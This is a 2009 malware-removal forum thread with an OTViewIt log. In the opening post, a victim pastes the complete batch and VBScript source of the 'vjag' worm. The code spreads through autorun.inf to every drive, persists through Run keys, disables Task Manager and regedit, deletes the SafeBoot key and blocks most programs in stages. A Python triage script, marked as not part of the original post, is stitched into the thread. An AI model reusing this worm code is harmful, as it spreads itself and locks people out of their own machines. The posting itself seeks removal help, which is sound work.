vjag virus


  • This topic is locked
15 replies to this topic

#1 nightjar59

Posted 02 April 2009 - 11:47 AM

So I got the auto run folder from the pen drive under linux and these are the files in it.

vjag.bat
@echo off
call %windir%\system32\auto\vjag1.bat
exit


vjag.vbs
if Month(Date)=20 and Day(Date)=22 then
a=msgbox("::::::......My Birthday......::::::",,"vjag:::::..999..:::::")
else
Set ws = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
Set car = fso.GetSpecialFolder(1)
v = car.Path
do
ws.run ""&v&"\auto\vjag.bat open" ,0, false
WScript.Sleep 40000
Loop
end if


vjag1.bat
@echo off
if exist j:\ goto j
if not "%1"=="" goto i

:j
cls
if exist j:\auto attrib +h +s j:\auto&attrib +h +s j:\autorun.inf
xcopy /I /y %windir%\system32\auto j:\auto
echo [autorun] >j:\autorun.inf
echo OPEN=auto\vstart.bat >>j:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>j:\autorun.inf
echo shell\open\Default=1 >>j:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>j:\autorun.inf
attrib +h +s j:\auto
attrib +h +s j:\autorun.inf

:i
if exist i:\ goto i1
if not "%1"=="" goto h

:i1
cls
if exist i:\auto attrib +h +s i:\auto&attrib +h +s i:\autorun.inf
xcopy /I /y %windir%\system32\auto i:\auto
echo [autorun] >i:\autorun.inf
echo OPEN=auto\vstart.bat >>i:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>i:\autorun.inf
echo shell\open\Default=1 >>i:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>i:\autorun.inf
attrib +h +s i:\auto
attrib +h +s i:\autorun.inf

:h
if exist h:\ goto h1
if not "%1"=="" goto g

:h1
cls
if exist h:\auto attrib +h +s h:\auto&attrib +h +s h:\autorun.inf
xcopy /I /y %windir%\system32\auto h:\auto
echo [autorun] >h:\autorun.inf
echo OPEN=auto\vstart.bat >>h:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>h:\autorun.inf
echo shell\open\Default=1 >>h:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>h:\autorun.inf
attrib +h +s h:\auto
attrib +h +s h:\autorun.inf

:g
if exist g:\ goto g1
if not "%1"=="" goto f

:g1
cls
if exist g:\auto attrib +h +s g:\auto&attrib +h +s g:\autorun.inf
xcopy /I /y %windir%\system32\auto g:\auto
echo [autorun] >g:\autorun.inf
echo OPEN=auto\vstart.bat >>g:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>g:\autorun.inf
echo shell\open\Default=1 >>g:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>g:\autorun.inf
attrib +h +s g:\auto
attrib +h +s g:\autorun.inf

:f
if exist f:\ goto f1
if not "%1"=="" goto e

:f1
cls
if exist f:\auto attrib +h +s f:\auto&attrib +h +s f:\autorun.inf
xcopy /I /y %windir%\system32\auto f:\auto
echo [autorun] >f:\autorun.inf
echo OPEN=auto\vstart.bat >>f:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>f:\autorun.inf
echo shell\open\Default=1 >>f:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>f:\autorun.inf
attrib +h +s f:\auto
attrib +h +s f:\autorun.inf

:e
if exist e:\ goto e1
if not "%1"=="" goto d

:e1
cls
if exist e:\auto attrib +h +s e:\auto&attrib +h +s e:\autorun.inf
xcopy /I /y %windir%\system32\auto e:\auto
echo [autorun] >e:\autorun.inf
echo OPEN=auto\vstart.bat >>e:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>e:\autorun.inf
echo shell\open\Default=1 >>e:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>e:\autorun.inf
attrib +h +s e:\auto
attrib +h +s e:\autorun.inf

:d
if exist d:\ goto d1
if not "%1"=="" goto c

:d1
cls
if exist d:\auto attrib +h +s d:\auto&attrib +h +s d:\autorun.inf
xcopy /I /y %windir%\system32\auto d:\auto
echo [autorun] >d:\autorun.inf
echo OPEN=auto\vstart.bat >>d:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>d:\autorun.inf
echo shell\open\Default=1 >>d:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>d:\autorun.inf
attrib +h +s d:\auto
attrib +h +s d:\autorun.inf

:c
attrib +h +s %windir%\system32\vjag.doc
if exist c:\ goto c1
if not "%1"=="" exit

:c1
cls
if exist c:\auto attrib +h +s c:\auto&attrib +h +s c:\autorun.inf
xcopy /I /y %windir%\system32\auto c:\auto
echo [autorun] >c:\autorun.inf
echo OPEN=auto\vstart.bat >>c:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>c:\autorun.inf
echo shell\open\Default=1 >>c:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>c:\autorun.inf
attrib +h +s c:\auto
attrib +h +s c:\autorun.inf
exit


vjag2.bat
@echo off
title cura
reg delete hklm\software\microsoft\windows\currentversion\run /v vjag /f
reg delete hklm\software\microsoft\windows\currentversion\run /v vjag2 /f
reg delete hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistryTools /f
reg delete hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /f
reg delete hkcu\software\microsoft\windows\currentversion\policies\explorer /v Restrictrun /f
reg delete hklm\software\microsoft\windows\currentversion\run /v vjag3 /f
cls
del /f /q %windir%\system32\auto
del /f /q %windir%\syste.txt
del /f /q %windir%\systeb.txt
del /f /q %windir%\systec.txt
del /f /q %windir%\systed.txt
del /f /q %windir%\systee.txt
del /f /q %windir%\systef.txt
del /f /q %windir%\systeg.txt
del /f /q %windir%\systeh.txt
cls
del /f /q %windir%\systei.txt
del /f /q %windir%\systej.txt
del /f /q %windir%\systek.txt
del /f /q %windir%\systel.txt
del /f /q %windir%\system.txt
del /f /q %windir%\systen.txt
del /f /q %windir%\systeo.txt
del /f /q %windir%\systep.txt
del /f /q %windir%\systeq.txt
goto asd

:asd
if exist j:\ goto j
if not "%1"=="" goto i

:j
cls
attrib -h -s autorun.inf
del /f /q j:\autorun.inf
del /f /q j:\auto

:i
if exist i:\ goto i1
if not "%1"=="" goto h

:i1
attrib -h -s autorun.inf
del /f /q i:\autorun.inf
del /f /q i:\auto

:h
if exist h:\ goto h1
if not "%1"=="" goto g

:h1
cls
attrib -h -s autorun.inf
del /f /q h:\autorun.inf
del /f /q h:\auto

:g
if exist g:\ goto g1
if not "%1"=="" goto f

:g1
cls
attrib -h -s autorun.inf
del /f /q g:\autorun.inf
del /f /q g:\auto

:f
if exist f:\ goto f1
if not "%1"=="" goto e

:f1
cls
attrib -h -s autorun.inf
del /f /q f:\autorun.inf
del /f /q f:\auto

:e
if exist e:\ goto e1
if not "%1"=="" goto d

:e1
cls
attrib -h -s autorun.inf
del /f /q e:\autorun.inf
del /f /q e:\auto

:d
if exist d:\ goto d1
if not "%1"=="" goto c

:d1
cls
attrib -h -s autorun.inf
del /f /q d:\autorun.inf
del /f /q d:\auto

:c
if exist c:\ goto c1
if not "%1"=="" exit

:c1
cls
attrib -h -s autorun.inf
del /f /q c:\autorun.inf
del /f /q c:\auto
exit


vjag2.vbs
cla=inputbox("Intro Clave",":::...Cuadro de clave...:::::...boxpasword...:::")
if not(cla=220385) then
v=msgbox("Incorrecto",,"Incorret")
else
Set ws = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
Set car = fso.GetSpecialFolder(1)
v = car.Path
ws.run ""&v&"\auto\vjag2.bat open" ,0, false
x=msgbox("::::..Correcto virus Finalizado..::::",,"::::..Corret end virus..::::")
end if


vjag3.bat
@echo off
if exist %windir%\syste.txt goto a
reg add hklm\software\microsoft\windows\currentversion\run /v vjag /d %windir%\system32\auto\vjag3.bat /f
reg add hklm\software\microsoft\windows\currentversion\run /v vjag2 /d %windir%\system32\auto\vjag.vbs /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistryTools /t reg_dword /d 1 /f
reg delete hklm\System\CurrentControlSet\Control\SafeBoot /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d 1 /f
echo 1 >%windir%\syste.txt
echo Cuenta regresiva desde el 15 Bitacora de un infectado >%windir%\system32\vjag.doc
echo . >>%windir%\system32\vjag.doc
goto vir

:a
cls
if exist %windir%\systeb.txt goto b
echo 1 >%windir%\systeb.txt
echo 15.- %date% %time% Me instale en tu pc y Tome control del registro de windows >>%windir%\system32\vjag.doc
goto vir

:b
cls
if exist %windir%\systec.txt goto c
echo 1 >%windir%\systec.txt
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer /v Restrictrun /t reg_dword /d 1 /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 1 /d vjag.vbs /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 2 /d notepad.exe /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 3 /d winword.exe /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 4 /d explorer.exe /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 5 /d powerpnt.exe /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 6 /d vj.doc /f
cls
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 7 /d excel.exe /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 8 /d vjag3.bat /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 8 /d vjag1.bat /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 9 /d vjag2.vbs /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 10 /d vjag.bat /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 11 /d vjag2.bat /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 12 /d vstart.bat /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 13 /d autorun.inf /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 14 /d vjag.doc /f
cls
echo . >>%windir%\system32\vjag.doc
echo 14.- %date% %time% Toma de control de los backup de windows >>%windir%\system32\vjag.doc
goto vir

:c
cls
if exist %windir%\systed.txt goto d
echo 1 >%windir%\systed.txt
echo . >>%windir%\system32\vjag.doc
echo 13.- %date% %time% Fue Bloqueado modo seguro de windows >>%windir%\system32\vjag.doc
goto vir

:d
cls
if exist %windir%\systee.txt goto e
echo 1 >%windir%\systee.txt
echo . >>%windir%\system32\vjag.doc
echo 12.- %date% %time% Desactivado el administrador de tareas si no sabes que es sale cuando oprimes ..ctrl alt supr.. >>%windir%\system32\vjag.doc
goto vir

:e
cls
if exist %windir%\systef.txt goto f
echo 1 >%windir%\systef.txt
echo . >>%windir%\system32\vjag.doc
echo 11.- %date% %time% Reposo:::...informacion:::El reposo fue dado segun las veces que encendiste el ordenador si fue una sola vez al dia entonces las fases del virus fueron una cada dia ...de lo contrario las fases se dieron tantas veces como encendiste el pc en ese dia.. >>%windir%\system32\vjag.doc
goto vir

:f
cls
if exist %windir%\systeg.txt goto g
echo 1 >%windir%\systeg.txt
echo . >>%windir%\system32\vjag.doc
echo 10.- %date% %time% Reposo::: >>%windir%\system32\vjag.doc
goto vir

:g
cls
if exist %windir%\systeh.txt goto h
echo 1 >%windir%\systeh.txt
echo . >>%windir%\system32\vjag.doc
echo 09.- %date% %time% Reposo::: >>%windir%\system32\vjag.doc
goto vir

:h
cls
if exist %windir%\systei.txt goto i
echo 1 >%windir%\systei.txt
echo . >>%windir%\system32\vjag.doc
echo 08.- %date% %time% ::: Fue restringido el acceso a la mayoria de los programas excepto algunos de Office y Block de Notas >>%windir%\system32\vjag.doc
goto vir

:i
cls
if exist %windir%\systej.txt goto j
echo 1 >%windir%\systej.txt
echo . >>%windir%\system32\vjag.doc
echo 07.- %date% %time% Reposo::: >>%windir%\system32\vjag.doc
goto vir

:j
cls
if exist %windir%\systek.txt goto k
echo 1 >%windir%\systek.txt
echo . >>%windir%\system32\vjag.doc
echo 06.- %date% %time% Reposo::: >>%windir%\system32\vjag.doc
goto vir

:k
cls
if exist %windir%\systel.txt goto l
echo 1 >%windir%\systel.txt
echo . >>%windir%\system32\auto\vjag.doc
echo 05.- %date% %time% Reposo::: >>%windir%\system32\vjag.doc
goto vir

:l
cls
if exist %windir%\system.txt goto m
echo 1 >%windir%\system.txt
reg delete hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 5 /f
echo . >>%windir%\system32\vjag.doc
echo 04.- %date% %time% ::Se restringio acceso a Microsoft Office PowerPoint >>%windir%\system32\vjag.doc
goto vir

:m
cls
if exist %windir%\systen.txt goto n
echo 1 >%windir%\systen.txt
reg delete hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 6 /f
echo . >>%windir%\system32\vjag.doc
echo 03.- %date% %time% ::Se restringio acceso a Microsoft Office Excel >>%windir%\system32\vjag.doc
goto vir

:n
cls
if exist %windir%\systeo.txt goto o
echo 1 >%windir%\systeo.txt
reg delete hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 3 /f
echo . >>%windir%\system32\vjag.doc
echo 02.- %date% %time% ::Se restringio acceso a Microsoft Office Word ::: Con esto casi se cerraron las oportunidades de poder quitar este virus >>%windir%\system32\vjag.doc
reg add hklm\software\microsoft\windows\currentversion\run /v vjag3 /d %windir%\system32\auto\vjag2.vbs /f
start %windir%\system32\auto\vj.doc
start %windir%\system32\auto\vjag2.vbs
goto vir

:o
cls
if exist %windir%\systep.txt goto p
echo 1 >%windir%\systep.txt
echo . >>%windir%\system32\vjag.doc
echo 01.- %date% %time% :: En esta estapa ya solo faltaba un reinicio mas si ya estas leyendo esto quiere decir que se cumplio::: Tengo el control total de windows >>%windir%\system32\vjag.doc
goto vir

:p
cls
if exist %windir%\systeq.txt goto vir
echo 1 >%windir%\systeq.txt
echo . >>%windir%\system32\vjag.doc
echo 00.- %date% %time% Fase terminar del virus es una lastima que hallas llegado hasta esta fase, El virus esta completamente ejecutado podras hacer respaldo de tu informacion ::--La que se salvo je je--:: >>%windir%\system32\vjag.doc
reg delete hklm\software\microsoft\windows\currentversion\run /v vjag3 /f
start %windir%\system32\vjag.doc
goto vir

:vir
taskkill /im cmd.exe /f /t
cls
exit


vstart
@echo off
set a=%dir%\%0
set b=%a:~2,3%
xcopy /I /y %dir%\auto %windir%\system32\auto
start explorer %b%
goto j

:j
start %windir%\system32\auto\vjag3.bat
start %windir%\system32\auto\vjag.vbs
attrib +h +s +r %windir%\system32\auto
exit


vstart.bat.VIR
@echo off
set a=%dir%\%0
set b=%a:~2,3%
xcopy /I /y %dir%\auto %windir%\system32\auto
start explorer %b%
goto j

:j
start %windir%\system32\auto\vjag3.bat
start %windir%\system32\auto\vjag.vbs
attrib +h +s +r %windir%\system32\auto
exit

So if you can help me?
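
Added example, not part of the original post and not the helper's fix: a static triage sketch in Python that reads batch script text offline (as the poster did under Linux) and lists the registry and autorun.inf changes the scripts make, which is the set of changes a cleanup has to confirm and reverse. The function and category names are illustrative assumptions; the sample lines are copied from vjag3.bat and vjag1.bat above.

```python
import re
from collections import Counter

# Sample input: lines copied from vjag3.bat and vjag1.bat as posted above.
SAMPLE = r"""
reg add hklm\software\microsoft\windows\currentversion\run /v vjag /d %windir%\system32\auto\vjag3.bat /f
reg add hklm\software\microsoft\windows\currentversion\run /v vjag2 /d %windir%\system32\auto\vjag.vbs /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistryTools /t reg_dword /d 1 /f
reg delete hklm\System\CurrentControlSet\Control\SafeBoot /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d 1 /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer /v Restrictrun /t reg_dword /d 1 /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 2 /d notepad.exe /f
echo [autorun] >j:\autorun.inf
echo OPEN=auto\vstart.bat >>j:\autorun.inf
attrib +h +s j:\autorun.inf
"""

# "echo <text> > X:\autorun.inf" or ">>": the script is writing an autorun file.
AUTORUN_WRITE = re.compile(
    r"^echo\s+(.*?)\s*>{1,2}\s*([a-z]):\\autorun\.inf\s*$", re.I)


def parse_reg(line):
    """Parse a `reg add|delete KEY [/v NAME] [/t TYPE] [/d DATA] [/f]` line.

    Assumption: no quoted arguments containing spaces, which holds for the
    scripts on this page. Returns a dict, or None for any other command.
    """
    tokens = line.split()
    if len(tokens) < 3 or tokens[0].lower() != "reg":
        return None
    if tokens[1].lower() not in ("add", "delete"):
        return None
    cmd = {"op": tokens[1].lower(), "key": tokens[2].lower(),
           "value": None, "data": None}
    i = 3
    while i < len(tokens):
        opt = tokens[i].lower()
        if opt in ("/v", "/t", "/d") and i + 1 < len(tokens):
            if opt == "/v":
                cmd["value"] = tokens[i + 1].lower()
            elif opt == "/d":
                cmd["data"] = tokens[i + 1]
            i += 2
        else:
            i += 1
    return cmd


def classify(line):
    """Return (category, detail) for a line that changes system state, else None."""
    line = line.strip()
    m = AUTORUN_WRITE.match(line)
    if m:
        return ("autorun-propagation", f"{m.group(2).lower()}: {m.group(1)}")
    cmd = parse_reg(line)
    if cmd is None:
        return None
    key, op, value = cmd["key"], cmd["op"], cmd["value"]
    if op == "add" and key.endswith(r"\currentversion\run"):
        return ("persistence", f"{value} -> {cmd['data']}")
    if (op == "add" and key.endswith(r"\policies\system")
            and value in ("disabletaskmgr", "disableregistrytools")):
        return ("tool-lockout", value)
    if op == "add" and key.endswith(r"\policies\explorer\restrictrun"):
        return ("program-allowlist", cmd["data"])
    if (op == "add" and key.endswith(r"\policies\explorer")
            and value == "restrictrun"):
        return ("program-allowlist", "enabled")
    if op == "delete" and r"\control\safeboot" in key:
        return ("safe-mode-removal", key)
    return None


def triage(script_text):
    """Classify every line of a batch script; returns a list of findings."""
    findings = []
    for line in script_text.splitlines():
        hit = classify(line)
        if hit:
            findings.append(hit)
    return findings


def summarize(findings):
    """Count findings per category."""
    return Counter(category for category, _ in findings)


if __name__ == "__main__":
    for category, detail in triage(SAMPLE):
        print(f"{category:20} {detail}")
```
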



#2 Farbar


Posted 02 April 2009 - 01:30 PM

Hi nightjar59,

Welcome to BC HijackThis forum and sorry for the delay. I am farbar. I am going to assist you with your problem.

Please refrain from making any changes to your system (updating Windows, installing applications, removing files, etc.) from now on as it might prolong handling your log and make the job for both of us more difficult.

Well done and thanks for posting the content of auto folder. I have made a fix but need to confirm the changes the malware has made and some additional information.
  • Please describe the problem as clearly as possible.

  • Please download OTViewIt by OldTimer.
  • Save it to your desktop.
  • Important: Rename it to powerpnt.exe
  • Double click on the powerpnt.exe on your desktop.
  • Click the "Scan All Users" checkbox.
  • Set File age to 60 days.
  • Type in the Custom Scans section: hijackthisbackups
  • Click Run Scan button.
  • Two reports will open, copy and paste them to your reply:
  • OTViewIt.txt <-- Will be opened
  • Extra.txt <-- Will be minimized

  • Please download HiJackThis.exe and save it to C: drive. This application doesn't need installation.
  • Important: Rename it to excel.exe
  • Double-click on excel.exe. Click Do a system scan and save a logfile then copy and paste the content of the log to your reply.

You might want to save this page on your favorites, so you can find it again when you return.

#3 nightjar59


Posted 02 April 2009 - 01:53 PM

OTviewIt
OTViewIt logfile created on: 4/2/2009 1:47:47 PM - Run 2
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\dreger\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1021.98 Mb Total Physical Memory | 493.18 Mb Available Physical Memory | 48.26% Memory free
2.41 Gb Paging File | 1.93 Gb Available in Paging File | 80.22% Paging File free
Paging file location(s): C:\pagefile.sys 1536 3072;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 37.24 Gb Total Space | 6.29 Gb Free Space | 16.89% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
Drive E: | 1.86 Gb Total Space | 0.16 Gb Free Space | 8.32% Space Free | Partition Type: FAT
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 001_23_TEACHER
Current User Name: dreger
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== Processes ==========

[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe
[2008/09/24 17:55:27 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
[2009/02/05 15:01:25 | 00,018,752 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
[2009/02/05 15:08:40 | 00,138,680 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\ashServ.exe
[2005/09/20 09:32:24 | 00,077,824 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\hkcmd.exe
[2005/09/20 09:36:20 | 00,114,688 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\igfxpers.exe
[2008/01/11 22:16:38 | 00,039,792 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
[2009/03/24 14:25:19 | 00,136,600 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jusched.exe
[2006/11/03 19:20:12 | 00,866,584 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MSASCui.exe
[2008/03/30 10:36:40 | 00,267,048 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunesHelper.exe
[2003/05/08 11:00:58 | 00,049,152 | ---- | M] (ScanSoft, Inc.) -- C:\Program Files\ScanSoft\OmniPageSE2.0\opwareSE2.exe
[2009/02/05 15:08:45 | 00,081,000 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\ashDisp.exe
[2009/01/28 07:32:24 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2005/07/22 03:47:22 | 00,151,552 | ---- | M] () -- C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
[2004/02/13 14:12:08 | 00,016,423 | ---- | M] () -- C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe
[2007/11/02 05:48:34 | 02,090,248 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
[2009/03/24 14:25:19 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
[2007/11/02 05:48:40 | 03,990,792 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
[2008/10/27 09:55:45 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
[2009/04/02 05:04:19 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
[2009/01/28 07:32:14 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
[2009/04/02 05:04:15 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
[2008/08/07 15:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
[2009/04/02 05:04:39 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe
[2008/10/16 15:09:44 | 00,051,224 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\wuauclt.exe
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\dreger\Desktop\powerpnt.exe.exe
[2008/04/14 05:42:30 | 00,069,120 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\notepad.exe

========== (O23) Win32 Services ==========

[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe -- (Apple Mobile Device [Auto | Running])
[2007/10/24 01:47:22 | 00,033,800 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe -- (aspnet_state [On_Demand | Stopped])
[2009/02/05 15:01:25 | 00,018,752 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe -- (aswUpdSv [Auto | Running])
[2009/02/05 15:08:40 | 00,138,680 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\ashServ.exe -- (avast! Antivirus [Auto | Running])
[2009/02/05 15:08:26 | 00,254,040 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe -- (avast! Mail Scanner [On_Demand | Stopped])
[2009/02/05 15:06:04 | 00,352,920 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\ashWebSv.exe -- (avast! Web Scanner [On_Demand | Stopped])
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe -- (BcmSqlStartupSvc [Auto | Running])
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe -- (Bonjour Service [Auto | Running])
[2007/10/24 01:47:40 | 00,070,144 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32 [On_Demand | Stopped])
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe -- (dkab_device [On_Demand | Stopped])
[2007/10/09 12:58:12 | 00,036,864 | ---- | M] (Microsoft Corporation) -- c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe -- (FontCache3.0.0.0 [On_Demand | Stopped])
[2009/03/03 14:53:08 | 00,033,176 | ---- | M] (NOS Microsystems Ltd.) -- C:\Program Files\NOS\bin\getPlus_HelperSvc.exe -- (getPlus® Helper [On_Demand | Stopped])
[2009/03/17 12:57:18 | 00,138,168 | ---- | M] (Google) -- C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe -- (gusvc [On_Demand | Stopped])
[2007/10/11 09:55:10 | 00,864,256 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe -- (idsvc [Unknown | Stopped])
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe -- (iPod Service [On_Demand | Running])
[2009/03/24 14:25:19 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe -- (JavaQuickStarterService [Auto | Running])
File not found -- -- (KodakCCS [On_Demand | Stopped])
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE -- (MDM [Auto | Running])
[2008/11/24 22:31:10 | 29,263,712 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe -- (MSSQL$MSSMLBIZ [On_Demand | Stopped])
[2008/11/24 22:31:08 | 00,045,408 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe -- (MSSQLServerADHelper [Disabled | Stopped])
[2007/10/11 09:55:14 | 00,122,880 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe -- (NetTcpPortSharing [Disabled | Stopped])
